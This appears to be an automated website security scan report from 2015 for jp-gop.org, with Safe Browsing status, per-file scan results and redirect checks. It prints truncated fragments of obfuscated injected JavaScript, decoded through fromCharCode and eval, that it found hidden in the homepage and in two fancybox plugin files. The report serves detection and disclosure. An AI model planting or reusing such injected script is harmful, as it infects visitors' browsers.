Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jp-gop.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jp-gop.org/ | 200 OK Content-Length: 17384 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" language="javascript" > slrodq="fr"+"omCh"+"arCo"+"de";if(document.querySelector)xdrrnt=4;brcq=("32,78,87,80,75,86,7b,81,80,32,85,42,4b,3a,3b,32,8d,1f,1c,32,88,73,84,32,85,86,73,86,7b,75,4f,39,73,7c,73,8a,39,4d,1f, | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://jp-gop.org/doteasy-under-construction/fancybox/jquery.fancybox.js | 200 OK Content-Length: 4958 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6 Antivirus reports:
| ||
http://jp-gop.org/doteasy-under-construction/fancybox/helpers/jquery.fancybox-media.js | 200 OK Content-Length: 10082 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6 Antivirus reports:
| ||
http://jp-gop.org/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:18 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/js/selectBox/jquery.selectBox.min.js | 200 OK Content-Length: 12728 Content-Type: application/x-javascript | clean |
http://jp-gop.org/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:21 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://jp-gop.org/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://jp-gop.org/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 27 Feb 2015 14:52:22 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jp-gop.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 14:52:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17384
Content-Type: text/html
Last-Modified: Tue, 10 Sep 2013 13:28:37 GMT
...17384 bytes of data.
GET / HTTP/1.1
Host: jp-gop.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 14:52:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17384
Content-Type: text/html
Last-Modified: Tue, 10 Sep 2013 13:28:37 GMT
...17384 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jp-gop.org
Referer: http://www.google.com/search?q=jp-gop.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jp-gop.org
Referer: http://www.google.com/search?q=jp-gop.org
Result:
The result is similar to the first query. There are no suspicious redirects found.